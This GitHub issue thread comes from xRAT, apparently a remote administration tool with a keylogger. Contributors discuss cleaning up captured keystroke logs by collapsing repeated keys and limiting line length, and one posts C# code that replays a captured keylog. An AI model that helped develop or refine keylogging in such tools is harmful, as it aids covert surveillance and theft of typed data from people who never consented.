### ISSUE TITLE
multible (repeated) key in keylog and very long line

### ISSUE THREAD

**Issue by DragonzMaster** [MaxXor/xRAT#119]
when you play as an example and you open the keylog
you see something like that
[Call of Duty® Ghosts]
wwwssssssssssssssssssssssss3wwwwwwwwwwwwwwwssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssrwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

you can see that the letter is repeted many times which is someway annoying
so it is possible to make changes to prevent that

---------------
and another thing the line is too too long :/
and it is very annoying to scroll horizontally for long time
so can we limit the line char number (70 characters for example)
so it can be more comfortable
*note : i copied a very small sample of the keylog just to clarify the problem and it was really too long

**Comment by yankejustin** [comment]
What do you suggest we do about repetitive keystrokes?

**Comment by d3agle** [comment]
This reference might contain a solution: http://stackoverflow.com/a/9356006

**Comment by DragonzMaster** [comment]
like if the key is pressed it won't be logged more than once unless if i put up my finger and press it again
is it possible ? @yankejustin

**Comment by d3agle** [comment]
To be fair, I don't see this as a problem

**Comment by yankejustin** [comment]
Yes, it is absolutely possible. However, without this behavior someone that does this intentionally when typing something can cause loss of accuracy.

**Comment by DragonzMaster** [comment]
may be (it is your opinion) but it is logs unnecessary keys which make the log looks bad and what can i benefit from a log contains hundreds of repeated "s" and "w" and similar keys used
and it increase Line's Length and log's size @d3agle

**Comment by yankejustin** [comment]
Well, I am not speaking of my opinion, I am speaking factually. Purposely ignoring subsequent keystrokes due to their proximity is an intentional loss of data (or the accuracy of data).

**Comment by DragonzMaster** [comment]
so can we make it optional ? @yankejustin 
my previous comment i was talking to @d3agle

**Comment by yankejustin** [comment]
Certainly an optional thing because there are many cases to where it is necessary to show them.
One way I can think of is to generate a collapsible table (basic html).

**Comment by DragonzMaster** [comment]
ok
now what about Line Char number limitation (the second part of issue) to prevent the line from being too long ?

**Comment by yankejustin** [comment]
Personally I think that the keylogger should be making a folder for each day anyways... Then place a limited amount of data in each file to divide them up.

**Comment by bitterypaul** [comment]
if same key is repeated more than 5 times, then we can make keylogger to log it as 5[w]

**Comment by xmizrx** [comment]
Nice work you guys I have an idea here's a picture to explain it

http://mizr.org/p/f/repository/z/01.gif

if you think its useful I'll release the source if not .. will then I'll think of another solution

**Comment by bitterypaul** [comment]
correct me if i am wrong. since quicklz is used, the log will be compressed. so the log will shrink in its size during transmission.

**Comment by yankejustin** [comment]
@xmizrx That would be a useful addition to the keylogger. :)
I was actually thinking the same thing when I looked back at the logs and realized how inaccurate I am with a keyboard! x)

**Comment by xmizrx** [comment]
Thanks here's the source although it still has some bugs but simple to fix

###
you need
3*textboxs
2*buttons
1*timer
###
The source
===
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;

namespace xServer.Forms
{
    public partial class FrmRePlay : Form
    {
        public FrmRePlay()
        {
            InitializeComponent();
        }
        private int i;
        private string strMessage;

        private void start_Click(object sender, EventArgs e)
        {
            string str;
            string str1;
            str1 = "";
            str = in1.Text;
            while (((str.IndexOf("[Back]") + 1)
                        != 0))
            {
                str1 = str.Substring((str.IndexOf("[Back]") + 6));
                str = fun(str.Substring(0, str.IndexOf("[Back]")));
                str = (str + str1);
            }
            in2.Text = str;
            //  will give the output
            i = 0;
            TextReplay.Text = "";
            timer1.Enabled = true;
            strMessage = in2.Text;
        }

        private void stop_Click(object sender, EventArgs e)
        {
            timer1.Stop();
        }
        public string fun(string str)
        {
            return str.Remove((str.Length - 1), 1);
        }

        private void timer1_Tick(object sender, EventArgs e)
        {
            i++;
            TextReplay.Text = (TextReplay.Text + strMessage.Substring((i - 1), 1));
            if ((i == strMessage.Length))
            {
                timer1.Enabled = false;
            }
            if (strMessage.Contains("[Enter]"))
            {
                strMessage = strMessage.Replace("[Enter]", "\r\n");
            }
        }

        private void FrmRePlay_Load(object sender, EventArgs e)
        {
            in1.Text = Clipboard.GetText();
            string str;
            string str1;
            str1 = "";
            str = in1.Text;
            while (((str.IndexOf("[Back]") + 1)
                        != 0))
            {
                str1 = str.Substring((str.IndexOf("[Back]") + 6));
                str = fun(str.Substring(0, str.IndexOf("[Back]")));
                str = (str + str1);
            }
            in2.Text = str;
            //  will give the output
            i = 0;
            TextReplay.Text = "";
            timer1.Enabled = true;
            strMessage = in2.Text;
        }
    }
}

###
